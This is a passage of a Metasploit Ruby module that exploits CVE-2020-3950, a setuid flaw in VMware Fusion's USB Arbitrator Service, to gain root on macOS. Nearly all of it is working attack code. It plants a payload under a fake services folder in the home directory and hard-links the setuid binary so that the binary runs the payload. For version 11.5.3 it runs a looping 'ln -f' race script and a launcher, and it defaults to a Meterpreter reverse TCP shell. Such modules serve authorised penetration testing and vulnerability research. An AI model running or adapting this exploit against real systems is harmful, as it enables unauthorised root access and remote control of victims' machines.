include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation',
'Description' => %q(
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3.
The Open VMware USB Arbitrator Service can be launched outide of its standard path
which allows loading of an attacker controlled binary. By creating a payload in the
user home directory in a specific folder, and creating a hard link to the 'Open VMware
USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload
with an effective UID of 0.
discovered an incomplete patch in 11.5.3 with a TOCTOU race.
Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Dhanesh Kizhakkinan', # discovery
'Rich Mirch', # edb module
'jeffball <jeffball@dc949.org>', # 11.5.3 exploit
'grimm'
],
'Platform' => [ 'osx' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'CVE', '2020-3950' ],
[ 'EDB', '48235' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ],
[ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ],
[ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ]
],
'DisclosureDate' => 'Mar 17 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp',
'WfsDelay' => 15
}
)
)

register_options [
OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
]

register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end

def open_usb_service
'Open VMware USB Arbitrator Service'
end

def usb_service
'VMware USB Arbitrator Service'
end

def get_home_dir
home = cmd_exec 'echo ~'
if home.blank?
fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
end
home
end

def content_dir
"#{get_home_dir}/Contents"
end

def base_dir
"#{content_dir}/Library/services/"
end

def kill_process(executable)
pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}')
cmd_exec pid_kill
end

def get_version
# Thanks to @ddouhine on github for this answer!
version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
/=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
if version_raw.blank?
fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
end
Gem::Version.new(version)
end

def pre_11_5_3
# Upload payload executable & chmod
payload_filename = "#{base_dir}#{usb_service}"
print_status "Uploading Payload: #{payload_filename}"
write_file payload_filename, generate_payload_exe
chmod payload_filename, 0o755
register_file_for_cleanup payload_filename

# create folder structure and hard link to the original binary
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
print_status "Created folder (#{link_folder}) and link"

print_status 'Starting USB Service (5 sec pause)'
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
Rex.sleep 5 # give time for the service to execute our payload
print_status 'Killing service'
cmd_exec "pkill '#{open_usb_service}'"
print_status "Deleting #{root_link_folder}"
rm_rf root_link_folder
end

def exactly_11_5_3
# Upload payload executable & chmod
payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
print_status "Uploading Payload to #{payload_name}"
write_file payload_name, generate_payload_exe
chmod payload_name, 0o755
#create race with codesign check
root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
print_status 'Uploading race condition executable.'
race = <<~EOF
#!/bin/sh
while [ "1" = "1" ]; do
ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}'
ln -f '#{payload_name}' '#{base_dir}#{usb_service}'
done
EOF
racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx racer_name, race
register_file_for_cleanup racer_name
register_dirs_for_cleanup root_link_folder
# create the hard link
print_status "Creating folder (#{link_folder}) and link"
cmd_exec "mkdir -p #{link_folder}"
cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"

# create the launcher to start the racer and keep launching our service to attempt to win
launcher = <<~EOF
#!/bin/sh
#{racer_name} &
for i in {1..#{datastore['MAXATTEMPTS']}}
do
echo "attempt $i";
'#{link_folder}#{open_usb_service}'
done
EOF
runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx runner_name, launcher
register_file_for_cleanup runner_name

print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
# XXX: The ; used by cmd_exec will interfere with &, so pad it with :
results = cmd_exec "#{runner_name} & :"
Rex.sleep 15 # give time for the service to execute our payload
vprint_status results

print_status 'Exploit Finished, killing scripts.'
kill_process racer_name
kill_process runner_name # in theory should be killed already but just in case
kill_process "'#{link_folder}#{open_usb_service}'"
# kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
# above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
# rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
end